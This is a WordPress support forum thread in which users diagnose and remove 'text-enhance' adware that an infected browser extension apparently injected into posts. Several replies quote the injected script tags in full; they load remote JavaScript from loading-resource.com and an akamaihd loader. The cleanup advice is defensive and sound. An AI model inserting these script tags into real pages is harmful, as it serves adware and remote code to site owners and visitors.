wordpress plugin showing text-enhance links?

  • I had text inhance get into my FF on my windows machine in the past, and I removed it by removing the add-on…

    Now on my linux machine, it is showing text-enhance links, and it only goes away when I disable shockwave FF extension, because it uses shockwave to display the links I guess.

    I downloaded a brand new install of chrome and it shows the links with no extensions or addons, which makes me think it has to be coming directly from my site via a plugin or something, or maybe it was hacked?

    my site is https://www.radbrains.com any help would be appreciated…

Viewing 9 replies - 16 through 24 (of 24 total)

  • Hey guys, I just fixed a client’s site with this problem.
    After wasting HOURS searching the code I finally searched the database and found the JS being inserted into the Post at the bottom. Going to the “Edit Post” page for that, sure enough, showed the code at the bottom of the post!

    I had the client follow all the awesome instructions here (full-disclosure: not my instructions): https://botcrawl.com/how-to-remove-text-enhance/

    Then I edited ALL the posts that were showing weird links and deleted the JS showing up at the bottom (this must be done from the HTML tab).

    Note: This was the JS that was being embedded on Save:

    https://loading-resource.com/data.geo.php?callback=window.__geo.getData
https://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862

    That has fixed the problem for a week now. This is quite an example of a browser bot getting into a website! The client said he was seeing the JS added upon ‘Save’ of new posts.

    Good luck!
    -Spotted Koi

    Totally agree with Spotted Koi’s post above. After a week of research and pulling my hair out, I found the same code when I looked at the html on the published pages that were affected (ctrl + u).
    1. I removed all of the plugins I thought could have been the problem, so it wouldn’t keep republishing the script
    2. I removed this script from the html of each page (by going to the edit feature in wordpress, clicking on each page, and then clicking the tab that says html vs. visual above the text). It was at the bottom of each of my pages.

    <script type=”text/javascript” src=”//loading-resource.com/data.geo.php?callback=window.__geo.getData”></script><script type=”text/javascript” src=”https://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862″></script&gt;

    This fixed the problem instantly. So, in regards to the email from text-enhance that is it a browser issue, that was totally NOT true in our case.

    I did however, learn to lock down my site better, which was a bonus in this whole time wasting ordeal. I found a lot of good info on that here: https://codex.www.ads-software.com/Hardening_WordPress Good luck!

    @deltaskelta – I just noticed your followup, My opinion is NO, FThemes is not reputable and I would not touch their free themes. My basis:

    Themes Ownership and Sponsored Links
    You may not claim intellectual or exclusive ownership to any of our products, modified or unmodified. FThemes.com reserves the rights to:

    ?Offer to its users paid and links free versions of the themes, released as free and contain sponsored links.
    ?Remove any link, which is not family friendly and link or redirect to: gambling, casino, poker, adult, pharmacy or any other illegal stuffs sites.

    This is telling you that they are inserting links into your themes. I didn’t download any of their themes to check exactly what they are doing and if they could be the cause of your original issue… but that disclaimer they provide is enough for me to stay away!

    EDIT – I decided to dig deeper and download a theme, there is encrypted garbage in there, links, checks to make sure you don’t edit the theme, etc. I wouldn’t touch their free themes.

    // Just my 2 cents!

    I’d also suggest reading this article on downloading themes. Fthemes is one of the theme sites referenced in it.

    Forgot about that article, thanks!

    wprelief aka Spotted Koi and tx12rh are on the right track here.

    This is definitely an issue with the WordPress user’s computer. It’s seems that this is some kind of a browser add-on/extension exploit. The WP user (could be you, or any WP user with editing rights – like a client’s website if you are a developer) has an infected computer that injects this crap into anything they edit.

    If you do a search of your WP database(s) using PHPmyAdmin, you’ll no doubt find some remnants of that injected crap floating around in various saved drafts and previous versions of many pages/posts.

    This is good news and bad:
    Good – is that it should be a localized problem (on someone’s computer – not on your websever files or database)
    Bad – Still need to track down where this exploit is coming from. Need to clean up your own computer (fix the browser problem, run a virus scan). Need to contact your client(s) and tell them to clean their computer. Need to remind everyone to keep their stuff clean and secure with proper virus protection (actually do the scans), with vigilance to not just download and install any crapware that you think is going to be fun, or helpful. Etc, etc, etc.

    In the mean time… I would really appreciate any specific leads regarding what browser add-ons/extensions and/or other malware is responsible for this outbreak so it can be squashed.

    Thanks.

    <script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="https://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

    Removing that code solved my issue. It was inserted in a lot of places, so I used a database replacer and it grabbed a whole bunch of instances. It’s gone on all machines I visit the site from now. Hope that helps other people.

    Pedro

    (@petredobrescu)

    Hey guys,

    Here’s a potential FireFox extension to cause this crap, it’s called VideoFileDownload:

    https://www.tinymce.com/forum/viewtopic.php?id=29649

    I hope this helps some of you to avoid the code to appear again on your sites.

    Stay safe!

    Hey Guys.. I spent a few days driving myself crazy over Text enhance on my WP sites… Until I stopped thinking it was a major problem and started thinking smaller. For me it was two plugins, BlackStudio Tiny MCE and Testimonials plugin… Here’s what you do…

    Deactivate all of your plugins. One by one, turn them on and refresh your site until you see the ads popup again.. now you have isolated the plugin.

    Check each page to see if the code is there. You may still find it on a few pages, however, when you go to ‘edit’ that particular page, the code you are looking for will now be visible in the html editor. (Typically at the bottom.) Simply delete the script and update the page…. Boom! All gone!

    This is the code that was on my site:

    <script type=”text/javascript” src=”//loading-resource.com/data.geo.php?callback=window.__geo.getData”></script><script type=”text/javascript” src=”https://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862″></script&gt;

Viewing 9 replies - 16 through 24 (of 24 total)
  • The topic ‘wordpress plugin showing text-enhance links?’ is closed to new replies.